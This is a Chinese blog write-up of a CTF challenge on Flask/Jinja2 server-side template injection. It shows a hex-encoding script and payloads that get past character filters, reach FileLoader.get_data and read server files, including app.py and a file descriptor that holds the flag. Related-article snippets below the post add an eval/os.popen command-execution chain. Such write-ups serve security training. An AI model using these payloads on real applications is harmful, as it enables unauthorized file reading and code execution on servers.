buuctf [pasecactf_2019]flask_ssti

最新推荐文章于 2024-04-09 16:33:13 发布
最新推荐文章于 2024-04-09 16:33:13 发布
阅读量1.2k 收藏 2
点赞数 1
分类专栏: BUUCTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CyhDl666/article/details/114990630
版权
  • 题目已经告诉是SSTI模板注入了
  • 测试一下
    在这里插入图片描述
  • 做题时用""发现了过滤 fuzz一下
  • 过滤了很多东西
  • 想到去年打校赛自己未解出来的一题 结合题目提示 是个16进制转换
  • 附上自己写的python脚本
code = "/proc/self/fd/1"
ssti = ""
length = len(code)
for i in range(length):
    ssti += "\\x" + hex(ord(code[i]))[2:]
print(ssti)
  • 将下面内容转化为16进制
  • __class__:\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f
  • __base__:\x5f\x5f\x62\x61\x73\x65\x5f\x5f
  • __subclasses__:\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f
  • 构造payload:
{{[]["\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f"]["\x5f\x5f\x62\x61\x73\x65\x5f\x5f"]["\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f"]()}}

在这里插入图片描述

  • 接下来就是选可用的对象和调用函数了
  • 我原本想用catch_warnings但是到最后的部分想起来.被过滤了不知道怎么调用了
  • 看了一下wp
  • 调用了这个类<class '_frozen_importlib_external.FileLoader'>
  • payload:
{{[]["\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f"]["\x5f\x5f\x62\x61\x73\x65\x5f\x5f"]["\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f"]()[91]["\x67\x65\x74\x5f\x64\x61\x74\x61"](0,"/proc/self/cmdline")}}

在这里插入图片描述

  • 发现现在运行的程序时app.py
  • payload:
{{[]["\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f"]["\x5f\x5f\x62\x61\x73\x65\x5f\x5f"]["\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f"]()[91]["\x67\x65\x74\x5f\x64\x61\x74\x61"](0,"app\x2epy")}}
  • 获得程序源码 可以推出flag所在位置
{{[]["\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f"]["\x5f\x5f\x62\x61\x73\x65\x5f\x5f"]["\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f"]()[91]["\x67\x65\x74\x5f\x64\x61\x74\x61"](0,"/proc/self/fd/3")}}
  • 得到flag!!!
海上清辉
关注
专栏目录
buuctf pasecactf_2019]flask_ssti
qq_40800734的博客
06-29 2532
1.测试存在ssti 2.获取类型所属的对象,后面显示被过滤了,看了大佬的文章_'.这三个被过滤了,但可以用十六进制绕过 3.寻找基类 4.寻找可用引用 {{()["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fbases\x5f\x5f"][0]["\x5f\x5fsubclasses\x5f\x5f"]()}} 5.接下来就是开始一系列利用了(基础不是很好,后面的待填坑)一些大佬的方法: 自己的一些总结:使用[]好像可以自动补.号 以下是等价的
BUUCTF__web题解合集(九)
风过江南乱的博客
09-23 1090
1、[GYCTF2020]FlaskApp 2、[NPUCTF2020]ReadlezPHP 3、[MRCTF2020]Ezpop 4、[极客大挑战 2019]RCE ME 5、[CISCN2019 总决赛 Day2 Web1]Easyweb
BUUCTF--[pasecactf_2019]flask_ssti
qq_46263951的博客
08-12 588
根据题目我们可以知道这是一道Flask SSTI的题。 打开后允许我们输入东西,会返回用奇怪字符包裹的昵称。 我们试一下{{2*2}},然后返回4。这里存在这SSTI。 这里过滤了很多东西,就不在一一测试,使用十六进制进行绕过. #转16进制py脚本 code = "/proc/self/fd/1" ssti = "" length = len(code) for i in range(length): ssti += "\\x" + hex(ord(code[i]))[2:] print(
[pasecactf_2019]flask_ssti
cjdgg的博客
07-05 2575
[pasecactf_2019]flask_ssti 进入题目后如下图所示 因为题目本身就提示ssti了,我也就直接尝试有没有过滤了 这里过滤了下划线,使用十六进制编码绕过,_编码后为\x5f, .过滤的话我们直接用[]包含绕过 这里过滤了单引号,我们用双引号绕过 这题过滤已经找完了,接下来是构造 相当于执行{{class}} 相当于执行{{class.bases[0]}} 相当于执行{{class.bases[0].subclasses()}} 下面贴一个脚本用来找可用类 import js
[pasecactf_2019]flask_ssti proc ssti config
m0_64180167的博客
12-13 806
其实这个很简单首先ssti 直接fenjing一把锁了这里被加密后 存储在 config中了 然后我们去config中查看即可{{config}}可以获取到flag的值然后就可以写代码解密因为都是异或 异或的异或就是 原本 所以不需要修改就可以输出flag。
buuctf-[Flask]SSTI
m0_62094846的博客
04-22 1212
页面上只有Hello guest,源代码上也是什么都没有,抓包添加XFF也没有改变。 是要GET一个参数name,这个不好想到 顺便确定有SSTI漏洞 <加字母就会被过滤 Smarty中的方法也不能用了 获取eval函数并执行任意python代码的POC {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__i...
pasecactf_2019_web_honey_shop
05-04
PASECA2019_Web_honey_shop 题目详情 PASECA CTF 2019 Web honey_shop Difficulty: Easy 考点 LFI Flask Cookie伪造 启动 docker-compose up -d open 题目说明 Flag位于app/flag.txt,Docker中位于/app/flag.txt。 ...
Bugku web Simple_SSTI_2 wp
Whaocai的博客
08-05 657
考点: ①SSTI注入 最近学了学python ssti注入,找一道题练习练习。 进去之后,提示我们有个flag参数,同时再用御剑扫一下发现没有别的页面。 结合题目,直接payload:?flag={{1+1}},用的是flask模板 jinja2引擎 常见的ssti构造payload思路是: 这道题比较简单,什么敏感关键词都没有过滤 ...
Apache mod_wsgi Flask 安装模块
11-22
预编译完成的Apache mod_wsgi Flask 32bit安装模块,python3.6.5,用于支持flask的网站部署,使用pip install mod_wsgi-4.6.5+ap24vc14-cp36-cp36m-win32.whl安装即可
[pasecactf_2019]tornado_casino
m0_57291352的博客
08-29 686
[pasecactf_2019]tornado_casino 题目 from sys import argv from random import getrandbits flag = '<redacted>' tornado_banner = ''' 88 ,d
buuctf [Flask]SSTI
qq_1873822的博客
03-16 2690
漏洞简介 SSTI即服务端模版注入攻击。由于程序员代码编写不当,导致用户输入可以修改服务端模版的执行逻辑,从而造成XSS,任意文件读取,代码执行等一系列问题。 复现过程 访问http://node3.buuoj.cn:29153/?name={{2*2}} 说明SSTI漏洞存在。 获取eval函数并执行任意python代码的POC: {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warni
Buuctf[Flask]SSTI 1
F1or_的博客
09-28 3410
最近CTF比赛里出了一道SSTI的题目,当时没有做出来,现在来学习下 SST是由于开发者的不恰当言语所造成 <html> <head> <title>SSTI_TEST</title> </head> <body> <h1>Hello, %s !</h1> </body> </html> 正确代码应是 <html> <head&g
[Flask]SSTI1 buuctf
weixin_74790320的博客
02-18 596
然后我们就用{{''.__class__}}看类的类型,但是无所谓,啥类型都可以,因为我们要找到的是他的基类,然后通过基类去找子类。然后在子类中找到catch_warnings这个类,然后去这个类的全局变量里面找到eval,上面链接我复现了vulhub的SSTI,其实本质上是一道题。{{''.__class__.__base__}}找到基类。所以就可以命令执行,然后flag在env环境变量里面。声明:本篇文章csdn要我一天发两篇所以我来水的。{%code%}这里是代码的意思在ssti里面。
BUUCTF-Real-[Flask]SSTI
分享
02-02 1278
服务端模板注入SSTI,可进行代码执行操作!
有关于服务端模板注入(ssti攻击)——BUUCTF - easy_tornado
ancan8807的博客
09-07 1128
打开题目出现3个链接 /flag.txt 中提示flag in /fllllllllllllag /welcome.txt 中提示 render /hints.txt 中提示 md5(cookie_secret+md5(filename)) 直接访问/fllllllllllllag失败。 百度了render可知,render是python的一个模板,他们的url都是...
[CSCCTF 2019 Qual]FlaskLight
qq_40327508的博客
11-28 251
考点:ssti注入 flask模板 根据题目等提示是flask模板,测试一下 获取所有的类 可以看到很多类,寻找那些可以包含文件或者命令执行的类 例如 file、popen等 例一: warnings.catch_warnings类 {{[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__('os').popen('ls').read()")}}
[GYCTF2020]FlaskApp(SSTI
qq_45521281的博客
06-09 3013
进入题目: 是一个用flask写的一个base64加解密应用。有一个加密页面和解密页面,思路应该是在加密页面输入payload进行加密,加密结果在解密页面进行解密,输出解密后的payload被渲染到页面输出后执行了payload。 官方write up说看到根据hint1,失败乃成功之母,应该能想到flask的debug模式。但是我当时看到的时候并没有想到是debug模式,这就是没有进行足够积累的后果。 base64decode在不会解析的时候就会报错,然后习惯性对base64解密页面进行报错实验,ba
BUUCTF刷题十一道(12)SSTI专题一
最新发布
qq_45837896的博客
04-09 897
SSTI填坑
python flask ssti学习笔记
m0_65129142的博客
12-21 827
python flask ssti学习笔记 学ssti就像是对python原理的一层深入探索,入口很简单,就是用户输入未经过滤便被服务器模板渲染,将其当作变量解析替换,从而达到读取文件或者执行命令等目的 简单示范 漏洞代码: #!/usr/bin/env python -- coding:utf8 -- import hashlib import logging import urllib.parse#python2没有parse,去掉就好 from flask import Flask from flas
bugkuctfweb题解simple_ssti_1
06-28
simple_ssti_1 是一个使用 Flask 框架编写的 web CTF 题目,主要涉及到服务器端模板注入 (Server-Side Template Injection, SSTI) 的问题。 这个题目中,使用者可以在输入框中输入任意字符串,然后后端会将这个字符...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值